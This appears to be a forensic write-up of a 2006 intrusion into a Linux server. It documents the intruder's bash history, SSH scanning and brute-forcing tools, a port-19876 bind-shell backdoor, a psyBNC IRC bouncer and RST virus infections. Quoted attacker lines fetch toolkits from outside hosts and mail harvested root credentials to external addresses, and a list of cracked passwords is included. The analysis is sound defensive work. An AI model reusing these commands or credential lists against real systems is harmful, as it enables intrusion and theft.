Forensics on Incident 1
Breach in ns0 @ e..oss
Analysis
ps auwx: 2006/03/17 +-20:20
========
test     30731  0.0  0.0   676  284 ?      S    00:21   0:00 ./ntpd
test     31116  0.0  0.2  2944 1360 ?      Ss   00:28   0:00 SCREEN
test     31117  0.0  0.2  3000 1228 pts/5  Ss   00:28   0:00 /bin/bash
test     31134  0.0  0.2  3164 1368 pts/5  S+   00:29   0:00 /bin/bash
test     32352  0.0  0.0  1444  280 ?      Ss   00:43   0:00 ./go
test     25680  0.0  0.2  2944 1412 ?      Ss   09:03   0:00 SCREEN
test     25681  0.0  0.3  3000 1656 pts/6  Ss   09:03   0:00 /bin/bash
test     25717  0.0  0.3  3160 1748 pts/6  S+   09:03   0:00 /bin/bash
test      4132  0.0  0.0  1344  204 pts/5  T+   10:40   0:00 ./go
test      4135  0.0  0.0     0    0 pts/5  Z+   10:40   0:00 [go] <defunct>
test      3211  0.0  0.0  1344  240 pts/5  T+   20:05   0:00 ./go
test      3224  0.0  0.0     0    0 pts/5  Z+   20:05   0:00 [go] <defunct>
test      4088  0.0  0.2  2704 1260 pts/6  S+   20:35   0:00 /bin/bash ./assh 24.35
test      4089 49.4  0.0  1492  456 pts/6  R+   20:35   4:43 ./pscan2 24.35 22
test      4090  0.0  0.0     0    0 pts/6  Z+   20:35   0:00 [pscan2] <defunct>
test      4097  0.0  0.2  2704 1260 pts/5  S+   20:35   0:00 /bin/bash ./assh 200.56
test      4098 49.4  0.0  1492  456 pts/5  R+   20:35   4:43 ./pscan2 200.56 22
test      4099  0.0  0.0     0    0 pts/5  Z+   20:35   0:00 [pscan2] <defunct>

Screens:
========
test@ns0:/root$ screen -ls
screen -r test/
There are screens on:
        31116.pts-4.ns0 (Detached)
        25680.pts-4.ns0 (Detached)
2 Sockets in /var/run/screen/S-test.
test@ns0:/root$ screen -r 31116

First screen:
=============
Copy of the current page:

bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N                                  #
#----------------------------------------------------#
# Scaner Privat                                      #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.58.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N                                  #
#----------------------------------------------------#
# Scaner Privat                                      #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.59.112.* (total: 0) (43.9% done)

Second screen:
==============
Copy of the full screen buffer:

test@ns0:/var/tmp/.. /dan$
test@ns0:/var/tmp/.. /dan$ ls
200               assh    gen-pass.sh  pass_file  sshf
200.221.pscan.22  auto    go           pscan2     ssh-scan
200.59.pscan.22   common  go.sh        ss         vuln.txt
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N                                  #
#----------------------------------------------------#
# Scaner Privat                                      #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.37.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N                                  #
#----------------------------------------------------#
# Scaner Privat                                      #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.38.136.* (total: 0) (53.3% done)
test@ns0:/var/tmp/.. /2$ ./auto
Enter A class range
24
Enter output file
24
test@ns0:/var/tmp/.. /2$ chmod +x 24
test@ns0:/var/tmp/.. /2$ ./24
######################################################
# Compiled By D-a-N                                  #
#----------------------------------------------------#
# Scaner Privat                                      #
#----------------------------------------------------#
######################################################
...

Bash history:
=============
Ran history in screen 25680.pts-4.ns0:
test@ns0:/var/tmp/.. /2$ history
    (the first 48 lines are identical to .bash_history, then:)
   49  ./auto
   50  chmod +x 24
   51  ./24

Content of .bash_history:
ls
cd
ls
wget
wget rzv69.marte.ro/rzv69.tgz
tar zxvf rzv69.tgz
ls
del 404
wget fire.prohosting.com/claubuc/scaner.jpg
tar xzvf scaner.jpg
cd scaner
./assh 207.44
ls
./auto 207.44
./assh 213.186
cd /var/tmp
cd .." "
screen
w
passwd
w
cd /var/tmp
ls -a
cd /home/test/
ls -a
cd scaner
ls -a
cat vuln.txt
cd /var/tmp
cat /etc/hosts
su vinoj
su vinoj
su trollingsecours
su trollingsecours
su trollingsecours
cd /var/tmp
ls -a
mkdir .." "
cd .." "
wget fire.prohosting.com/scarlatu/dan.jpg
wget fire.prohosting.com/scarlatu/psy.jpg
tar xzvf psy.jpg
cd .bash
./ntpd
cd ..
tar xzvf dan.jpg
cd dan
screen
ls -a
./go.sh 200.41
./assh 200.41
exit
w
screen -r
screen -r 30860.pts-2.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd dan
pico vuln.txt
rm -rf vuln.txt
touch vuln.txt
cd ..
tar xzvf dan.jpg
ls -a
cd dan
ls -a
cd ..
mv dan 1
tar xzvf dan.jpg
mv dan 2
mv 1 dan
ls -a
cd 2
screen
screen -r
screen -r 30860.pts-2.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
cd /var/tmp
cd .." "
cd 2
pico vuln.txt
cd ..
cd dan
pico vuln.txt
cat vuln.txt
clear
w
screen -r
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
ls -a
cd /var/tmp
cd .." "
cd dan
vi vuln.txt
cd /var/tmp
cd .." "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd .." "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
crontab -e

Tools:
======
* Attempt to download rzv69.marte.ro/rzv69.tgz, err 404
* Download tools from fire.prohosting.com/claubuc/scaner.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/dan.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/psy.jpg (tgz)
* Romanian scripts
* Compiled By D-a-N
* cat log|mail -s 'linux-printer' usdpower@yahoo.com (dan tools)
* cat log|mail -s 'linux-printer' scaneru_meu@yahoo.com (scaner tools)

Scans:
======
* scan ssh on ranges 200.55 200.58 200.59 24.34 24.37 24.38 207.44 213.186

Netstat excerpt (among the 800 simultaneous scan connections):
tcp  0  1  213.186.53.59:59930  24.35.236.71:22     SYN_SENT  4089/pscan2
tcp  0  1  213.186.53.59:60352  200.56.236.93:22    SYN_SENT  4098/pscan2
tcp  0  1  213.186.53.59:60288  200.56.236.29:22    SYN_SENT  4098/pscan2
tcp  0  1  213.186.53.59:60424  200.56.236.165:22   SYN_SENT  4098/pscan2
tcp  0  1  213.186.53.59:60233  200.56.235.229:22   SYN_SENT  4098/pscan2
tcp  0  1  213.186.53.59:60169  200.56.235.165:22   SYN_SENT  4098/pscan2
tcp  0  1  213.186.53.59:60095  200.56.235.91:22    SYN_SENT  4098/pscan2

IRC:
====
* Connection to IRC (port 6667) through psyBNC (the process named ntpd) to 195.204.1.130
  (195.204.1.130 = oslo1.no.eu.undernet.org)

Netstat:
tcp  0  0  0.0.0.0:6667         0.0.0.0:*           LISTEN       30731/ntpd
tcp  0  0  213.186.53.59:34227  195.204.1.130:6667  ESTABLISHED  30731/ntpd

Diffs between the downloaded tool and the hacker's version:
--- log/psybnc.log 1970-01-01 01:00:00.000000000 +0100 +++ 
log/psybnc.log 2006-03-19 23:32:53.000000000 +0100 @@ -0,0 +1,15 @@ +Fri Mar 17 00:21:14 :Listener created :0.0.0.0 port 6667 +Fri Mar 17 00:21:14 :psyBNC2.3BETA-cBtITLdDMSNp started (PID :30731) +Fri Mar 17 00:21:14 :Loading all Users.. +Fri Mar 17 00:21:14 :No Users found. +Fri Mar 17 00:21:29 :connect from 209-NAT.s-man.net +Fri Mar 17 00:21:31 :Lost Connection from 209-NAT.s-man.net (dan) +Fri Mar 17 00:22:31 :connect from 209-NAT.s-man.net +Fri Mar 17 00:22:39 :Noul User:dan (x) a fsot adaugat de dan +Fri Mar 17 00:22:48 :User dan () nu are nici un server adaugat +Fri Mar 17 00:23:05 :User dan () trying lelystad.nl.eu.undernet.org port 6667 (). +Fri Mar 17 00:23:05 :User dan () connected to lelystad.nl.eu.undernet.org:6667 () +Fri Mar 17 00:23:27 :Userul dan () A fost deconectat(de la lelystad.nl.eu.undernet.org) motivul: Closing Link: D4aNieL by Lelystad.NL.EU.UnderNet.Org (K-lined) +Fri Mar 17 00:23:42 :User dan () trying 195.204.1.130 port 6667 (). +Fri Mar 17 00:23:43 :User dan () connected to 195.204.1.130:6667 () +Fri Mar 17 00:30:35 :User dan quitted (from 209-NAT.s-man.net) --- motd/USER1.MOTD 1970-01-01 01:00:00.000000000 +0100 +++ motd/USER1.MOTD 2006-03-19 23:32:53.000000000 +0100 
@@ -0,0 +1,71 @@ +:Oslo1.NO.EU.undernet.org 001 D4aNieL :Welcome to the UnderNet IRC Network, D4aNieL +:Oslo1.NO.EU.undernet.org 002 D4aNieL :Your host is Oslo1.NO.EU.undernet.org, running version u2.10.11.07 +:Oslo1.NO.EU.undernet.org 003 D4aNieL :This server was created Mon Sep 5 2005 at 01:40:32 CEST +:Oslo1.NO.EU.undernet.org 004 D4aNieL Oslo1.NO.EU.undernet.org u2.10.11.07 dioswkgx biklmnopstvr bklov +:Oslo1.NO.EU.undernet.org 005 D4aNieL WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=30 MAXBANS=45 NICKLEN=12 MAXNICKLEN=15 :are supported by this server +:Oslo1.NO.EU.undernet.org 005 D4aNieL TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,imnpstr CASEMAPPING=rfc1459 NETWORK=UnderNet :are supported by this server +:Oslo1.NO.EU.undernet.org 251 D4aNieL :There are 31261 users and 80486 invisible on 28 servers +:Oslo1.NO.EU.undernet.org 252 D4aNieL 82 :operator(s) online +:Oslo1.NO.EU.undernet.org 253 D4aNieL 237 :unknown connection(s) +:Oslo1.NO.EU.undernet.org 254 D4aNieL 42167 :channels formed +:Oslo1.NO.EU.undernet.org 255 D4aNieL :I have 7253 clients and 1 servers +:Oslo1.NO.EU.undernet.org 375 D4aNieL :- Oslo1.NO.EU.undernet.org Message of the Day - +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 2005-12-16 5:48 +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Welome to Oslo*.NO.EU.undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Disclaimer / Rules +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Irc is an umoderated international medium. Cloning is +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- strictly forbidden on this server, any clones will +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not be tolerated. Mass Messaging / Mass Invites are not +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- allowed on any Undernet server, any offenders will be killed. 
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Using this server means you agree to all of its rules and the +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- rules of Undernet. If you cannot agree to this then /quit now. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Server contact info: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- E-mail : oslo@undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> News: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.05.2005] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are out of news. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.12.2004] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We shut down the channel #banetele. Most of the users in there needed +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- reop/channel related helping and we have #nastrand for that. For info +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not related to channel/user problems, email oslo@undernet.org. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [26.08.2003] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are back online :) +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Thank you to our provider www.banetele.com for all help! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Ports: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 6666, 6667, 6668, 7000 +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Bot Policies: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- It is allowed to run NON abusive bots on this server, all abusive +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- bots will be killed on sight. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Undernet has Cservice. 
Go to http://cservice.undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- or #Cservice if you have any questions. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Help Channels: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #nastrand -> Oper/IRC Help +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #cservice -> Cservice questions +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #mIRC -> For mIRC questions +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #vh -> For help with viruses +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #helpchan -> IRC Help +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Please notice that these channels are not administrated by the +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- oslo.* crew and we and/or the server sponsors can not be held +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- responsible for actions taken or info given in the channels. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> AGAIN .. READ THIS !! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- NO CLONES, NO FLOODING, NO HARASSING, NO SPAMMING! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- The use of this server is no right, but a privilege. The admin(s) +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- and opers can revoke this priviledge without further notice and +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- without a reason. +:Oslo1.NO.EU.undernet.org 376 D4aNieL :End of /MOTD command. --- psybnc.conf 2003-04-07 14:47:00.000000000 +0200 +++ psybnc.conf 2006-03-19 23:32:53.000000000 +0100 
@@ -1,3 +1,25 @@ PSYBNC.SYSTEM.PORT1=6667 PSYBNC.SYSTEM.HOST1=* PSYBNC.HOSTALLOWS.ENTRY0=*;* +USER1.USER.LOGIN=dan +USER1.USER.USER=x +USER1.USER.PASS==0x'q'0'W`2'S0I'F`x +USER1.USER.RIGHTS=1 +USER1.USER.VLINK=0 +USER1.USER.PPORT=0 +USER1.USER.PARENT=0 +USER1.USER.QUITTED=0 +USER1.USER.DCCENABLED=1 +USER1.USER.AUTOGETDCC=0 +USER1.USER.AIDLE=0 +USER1.USER.LEAVEQUIT=0 +USER1.USER.AUTOREJOIN=1 +USER1.USER.SYSMSG=1 +USER1.USER.LASTLOG=0 +USER1.USER.NICK=D-a-N +USER1.SERVERS.SERVER1=lelystad.nl.eu.undernet.org +USER1.SERVERS.PORT2=6667 +USER1.SERVERS.SERVER2=195.204.1.130 +USER1.SERVERS.PORT1=6667 +USER1.CHANNELS.ENTRY1=#porumbei +USER1.CHANNELS.ENTRY0=#xibit

Backdoor:
=========
* ./go opens port 19876 with a shell, without authentication
  (cf. http://www.2701.org/archive/200311240000.html)
  Netstat:
  tcp  0  0  0.0.0.0:19876  0.0.0.0:*  LISTEN  32352/go
* ./ss (cf. http://www.securiteam.com/tools/5EP0B0ADFO.html)
  Fast SYN Scanner (libnet, libpcap), 11 Jul. 2004
  Credit: The information has been provided by Doctor BIOS.
  The following tool is a fast SYN scanner written in C.

vuln.txt:
=========
cf. http://www.lockeddown.net/rst-expl.txt

ssh brute-force:
================
ssh-scan and sshf
./sshf <procese adika cate de alea deodata incerc>   ~= how many processes to run together

/etc/passwd:
============
test:x:1024:1024:,,,:/home/test:/bin/false

mails:
======
cat /etc/passwd
/sbin/ifconfig |grep inet
cat /etc/hosts
uname -a
w
ping -c 3 www.yahoo.com
cat vuln.txt
chmod +x go
./go

139P Received: from test by ns0.exxoss.com with local (Exim 4.50)
	for usdpower@yahoo.com; Fri, 17 Mar 2006 17:35:14 +0100
023T To: usdpower@yahoo.com
023  Subject: linux-printer
047I Message-Id: <E1FKHv0-0008GG-4C@ns0.exxoss.com>
034F From: ",,," <test@ns0.exxoss.com>
038  Date: Fri, 17 Mar 2006 17:35:14 +0100

To-be-Mailed data:
administrator:administrator:24.16.169.218
guest:guest:24.16.169.218
test:test:24.3.178.253
mysql:mysql:200.27.145.74
root:admin1:200.31.199.77
root:password:24.8.131.152
root:secure:24.11.225.20
root:123456:200.32.86.228
root:1234567890:200.32.86.228
root:admin1:200.32.86.228
root:admin:200.32.86.228
root:administrator1:200.32.86.228
root:backup:200.32.86.228
root:passwd:200.32.86.228
root:password123:200.32.86.228
root:password:200.32.86.228
root:qwerty:200.32.86.228
root:root1:200.32.86.228
root:root:200.32.86.228
root:rootroot:200.32.86.228
root:secret:200.32.86.228
root:secure:200.32.86.228
root:administrator:200.32.86.228   (honeypot probably)

RST virus:
==========
Quick and dirty way to find infected files:
find . -type f -exec strings --all {} \; |grep snortdos

Files:
"Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER
/tmp/scaner/go        Infection: Unix/RST.B
/tmp/scaner/pscan2    Infection: Unix/RST.B
/tmp/scaner/ss        Infection: Unix/RST.B
/tmp/scaner/ssh-scan  Infection: Unix/RST.B
/tmp/scaner/sshf      Infection: Unix/RST.B
Results of virus scanning:
Infected: 5

It seems that the infected files update themselves at each run and modify their timestamp:

/home/test/scaner:
 23714 2006-03-06 23:23 go
 25503 2005-05-06 19:00 pscan2
458068 2006-03-07 00:03 ss
846520 2006-03-07 00:03 sshf
846832 2006-03-06 23:12 ssh-scan

/var/tmp/.. /2:
 23714 2006-03-17 21:17 go
 25503 2006-03-17 21:17 pscan2
458068 2006-03-17 21:17 ss
846520 2006-03-17 21:17 sshf
846832 2006-03-17 21:17 ssh-scan

/var/tmp/.. /dan:
 23714 2006-03-17 10:35 go
 25503 2006-03-17 21:17 pscan2
458068 2006-03-17 21:17 ss
846520 2006-03-17 21:17 sshf
846832 2006-03-17 21:17 ssh-scan

21:17 corresponds to the crash of the server, so the infected executables were probably still held open even after being killed.

Note: the same virus is also present in:
/ns0/var/www/www.fmjbf.org/phpSecurePages/bindtty2: Linux.RST.B FOUND
/ns0/var/www/www.fmjbf.org/phpSecurePages/btty: Linux.RST.B FOUND

TIMELINE:
=========
2006/02/16 08:58:08 82.79.137.30     vsftpd: Thu Feb 16 08:58:08 2006 [pid 23877] [demo] FAIL LOGIN: Client "82.79.137.30"
Mar 6 12:28:21 localhost sshd[31087]: error: PAM: Authentication failure for skycode from 193.190-200-80.adsl.skynet.be
Mar 6 12:28:24 localhost sshd[31087]: Accepted keyboard-interactive/pam for skycode from 80.200.190.193 port 13329 ssh2
Mar 6 12:29:31 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
Mar 06 06 12:30:50  4096 m.c drwxr-xr-x root root /etc/webmin
                     639 m.c -rw------- root root /etc/webmin/miniserv.conf
Mar 6 12:31:05 localhost webmin[31297]: Webmin starting
Mar 6 12:31:13 localhost webmin[31307]: Successful login as root from 193.190-200-80.adsl.skynet.be
2006/03/06 13:48:47 82.79.137.24 *   vsftpd: Mon Mar 6 13:48:47 2006 [pid 4586] [test] OK LOGIN: Client "82.79.137.24"
Mar 03 06 15:53:30    21 m.c -rw-r----- root shadow /etc/webmin/miniserv.users
Mar 03 06 16:11:31  4096 m.c drwxr-xr-x root root /etc/exim4
                    7838 m.c -rw-r--r-- root root /etc/exim4/exim4.conf
Mar 6 17:59:47 localhost sshd[22697]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 11272 ssh2
Mar 6 19:43:12 localhost sshd[32573]: Accepted publickey for dorian1200 from 217.117.45.148 port 49764 ssh2
Mar 6 19:43:17 localhost sudo: dorian1200 : TTY=pts/4 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
Mar 6 20:22:42 localhost sshd[3285]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 12754 ssh2
dorian12 pts/2 217.117.45.148 Mon Mar 6 21:38 - 21:40 (00:01)
Mar 6 21:38:37 localhost sshd[10242]: Accepted publickey for dorian1200 from 217.117.45.148 port 44246 ssh2
Mar 6 21:38:44 localhost sudo: dorian1200 : TTY=pts/2 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
2006/03/06 22:27:30 82.79.137.26     26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:30 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:27:31 82.79.137.26     26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:31 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.56/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:28:16 82.79.137.27     Mar 6 22:28:16 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/06 22:28:18 82.79.137.27     vsftpd: Mon Mar 6 22:28:18 2006 [pid 14875] [anonymous] FAIL LOGIN: Client "82.79.137.27"
2006/03/06 22:28:18 82.79.137.18     Mar 6 22:28:18 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.18
2006/03/06 22:28:20 82.79.137.18     vsftpd: Mon Mar 6 22:28:20 2006 [pid 14881] [anonymous] FAIL LOGIN: Client "82.79.137.18"
2006/03/06 22:28:29 82.79.137.25 *   vsftpd: Mon Mar 6 22:28:29 2006 [pid 14911] [test] OK LOGIN: Client "82.79.137.25"
2006/03/06 22:28:30 82.79.137.14 *   vsftpd: Mon Mar 6 22:28:30 2006 [pid 14914] [test] OK LOGIN: Client "82.79.137.14"
2006/03/06 22:28:39 82.79.137.22     Mar 6 22:28:39 localhost sshd[14930]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22.metronetwork.rdsbz.ro user=test
2006/03/06 22:28:41 82.79.137.22     Mar 6 22:28:41 localhost sshd[14924]: error: PAM: Authentication failure for test from 22.metronetwork.rdsbz.ro
2006/03/06 22:28:43 82.79.137.22 *   Mar 6 22:28:43 localhost sshd[14924]: Accepted keyboard-interactive/pam for test from 82.79.137.22 port 1383 ssh2
2006/03/06 22:28:43 82.79.137.22 *   Mar 6 22:28:43 localhost sshd[14934]: (pam_unix) session opened for user test by (uid=0)
2006/03/06 22:28    82.79.137.22 *   test pts/2 82.79.137.22 Mon Mar 6 22:28 - 00:21 (01:52)
2006/03/06 22:31:06 82.79.137.18     Mar 6 22:31:06 localhost sshd[15200]: Illegal user asd from 82.79.137.18
2006/03/06 23:29:14 82.79.137.7  *   vsftpd: Mon Mar 6 23:29:14 2006 [pid 20547] [test] OK LOGIN: Client "82.79.137.7"
2006/03/06 22:40:54 82.79.137.22 *!  Mar 06 06 22:40:54 167818 m.. -rw-r--r-- test test /home/test/scaner/207.44.pscan.22
2006/03/06 23:12:35 82.79.137.22 *!  Mar 06 06 23:12:35 846832 m.. -rwxr-xr-x test test /home/test/scaner/ssh-scan
2006/03/06 23:23:56 82.79.137.22 *!  Mar 06 06 23:23:56  23714 m.. -rwxr-xr-x test test /home/test/scaner/go
2006/03/06 00:03:34 82.79.137.22 *!  Mar 07 06 00:03:34 846520 m.. -rwxr-xr-x test test /home/test/scaner/sshf
2006/03/06 00:03:34 82.79.137.22 *!                      4096 m.. drwxr-xr-x test test /home/test/scaner
2006/03/06 00:03:34 82.79.137.22 *!                    458068 m.. -rwxr-xr-x test test /home/test/scaner/ss
skycode pts/3 213.186.53.55 Tue Mar 7 00:14 - down (00:45)
2006/03/07 00:21:24 82.79.137.22 *   Mar 7 00:21:24 localhost sshd[14934]: (pam_unix) session closed for user test
skycode pts/2 213.186.53.55 Tue Mar 7 00:58 - down (00:01)
runlevel (to lvl 6)   Tue Mar 7 00:59 - 00:59 (00:00)  2.4.27-2-386
shutdown system down  Tue Mar 7 00:59 - 01:02 (00:02)  2.4.27-2-386
reboot   system boot  Tue Mar 7 01:02 - 08:45 (07:42)  2.4.27-2-386
runlevel (to lvl 2)   Tue Mar 7 01:02 - 08:45 (07:42)  2.4.27-2-386
skycode  pts/0        Tue Mar 7 01:04 - 01:04 (00:00)  213.186.53.55
skycode  pts/0        Tue Mar 7 08:28 - down  (00:16)  213.186.53.55
runlevel (to lvl 6)   Tue Mar 7 08:45 - 08:45 (00:00)  2.4.27-2-386
shutdown system down  Tue Mar 7 08:45 - 08:48 (00:02)  2.4.27-2-386
reboot   system boot  Tue Mar 7 08:48 - 09:18 (00:30)  2.4.27-2-386
runlevel (to lvl 2)   Tue Mar 7 08:48 - 09:18 (00:30)  2.4.27-2-386
skycode  pts/0        Tue Mar 7 08:56 - down  (00:22)  213.186.53.55
skycode  pts/1        Tue Mar 7 09:17 - down  (00:01)  213.186.53.55
runlevel (to lvl 6)   Tue Mar 7 09:18 - 09:18 (00:00)  2.4.27-2-386
shutdown system down  Tue Mar 7 09:18 - 09:22 (00:03)  2.4.27-2-386
reboot   system boot  Tue Mar 7 09:22 - 09:25 (00:03)  2.4.27-2-386
runlevel (to lvl 2)   Tue Mar 7 09:22 - 09:25 (00:03)  2.4.27-2-386
skycode  pts/0        Tue Mar 7 09:23 - down  (00:01)  217.136.140.81
runlevel (to lvl 6)   Tue Mar 7 09:25 - 09:25 (00:00)  2.4.27-2-386
shutdown system down  Tue Mar 7 09:25 - 09:28 (00:02)  2.4.27-2-386
reboot   system boot  Tue Mar 7 09:28 - 09:44 (00:15)  2.4.27-2-386
runlevel (to lvl 2)   Tue Mar 7 09:28 - 09:44 (00:15)  2.4.27-2-386
skycode  pts/0        Tue Mar 7 09:34 - down  (00:09)  217.136.140.81
runlevel (to lvl 6)   Tue Mar 7 09:44 - 09:44 (00:00)  2.4.27-2-386
shutdown system down  Tue Mar 7 09:44 - 09:48 (00:04)  2.4.27-2-386
reboot   system boot  Tue Mar 7 09:48 - 01:03 (12+15:14)  2.4.27-2-386
runlevel (to lvl 2)   Tue Mar 7 09:48 - 01:03 (12+15:14)  2.4.27-2-386
2006/03/09 14:57:31 82.79.137.27 *   vsftpd: Thu Mar 9 14:57:31 2006 [pid 5545] [test] OK LOGIN: Client "82.79.137.27"
2006/03/09 14:57:31 82.79.137.26 *   vsftpd: Thu Mar 9 14:57:31 2006 [pid 5541] [test] OK LOGIN: Client "82.79.137.26"
2006/03/09 14:57:31 82.79.137.28 *   vsftpd: Thu Mar 9 14:57:31 2006 [pid 5543] [test] OK LOGIN: Client "82.79.137.28"
2006/03/09 14:57:31 82.79.137.7  *   vsftpd: Thu Mar 9 14:57:31 2006 [pid 5547] [test] OK LOGIN: Client "82.79.137.7"
2006/03/09 14:57:33 82.79.137.28 *   vsftpd: Thu Mar 9 14:57:33 2006 [pid 5561] [test] OK LOGIN: Client "82.79.137.28"
2006/03/09 14:57:33 82.79.137.30 *   vsftpd: Thu Mar 9 14:57:33 2006 [pid 5563] [test] OK LOGIN: Client "82.79.137.30"
